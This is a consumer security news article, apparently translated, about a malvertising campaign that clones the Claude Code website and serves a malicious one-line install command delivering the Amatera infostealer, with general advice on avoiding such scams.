This Scam Imitates the Official Codex Claude Website to Distribute Malware.
If you use an AI-powered programming assistant like Claude Code, here’s a good reason to always make sure you’re copying commands from a legitimate interface: scammers are now using cloned versions of popular tools to distribute information-stealing malware via fake installation instructions—a tactic known as InstallFix.
Fake Claude code interface used for InstallFix attacks.
Researchers at Push Security discovered carefully copied versions of Claude Code, Anthropic’s AI-powered programming assistant, that look exactly like the original, including the layout, branding, text, documentation sidebar, and similar domain. Every link on the page even redirects to the legitimate Claude Code website. The only malicious part is a single-line command for installing Claude Code for macOS, Windows PowerShell, and Windows CMD. If you copy and paste this into the terminal, the malware will run instead of Claude Code.
InstallFix is a variation of ClickFix, a social engineering tactic that uses fake error messages, CAPTCHAs, and command lines to trick users into installing malware on their devices. A similar campaign recently used fake OpenClaw installers .
The current Claude Code scheme targets both Windows and Mac users with the information -stealing malware Amatera . This malware can collect browser data—saved passwords, cookies, session tokens, autofill data, even cryptocurrency wallets and credentials—as well as system information. Attackers can further evade detection by hosting malicious websites on legitimate platforms like CloudFlare Pages and Squarespace.
How to Avoid InstallFix Attacks
Push Security discovered that these fake installation pages were distributed through malicious advertising—specifically, through sponsored Google results when users searched for terms like “Claude Code,” “Claude Code install,” or “Claude Code CLI.” Be especially careful when searching for programming tools or installation instructions, and do not run commands copied from emails, forums, social media posts, or websites unless you have verified their authenticity yourself.
Google’s search results allow you to hide ads (after you’ve scrolled past them), which is a good practice to avoid accidentally clicking on malicious ads. It’s also recommended to bookmark trusted sources you know you’ll need to return to, so you don’t have to go through the entire search.
Finally, carefully check both URLs and commands. Attackers use tricks to make fake web addresses appear legitimate at first glance, but upon closer inspection, you’ll see that you’re not on Claude Cod’s real site. You can also enter commands manually (again, only from trusted sources) to ensure you’re not copying or executing anything hidden in the text.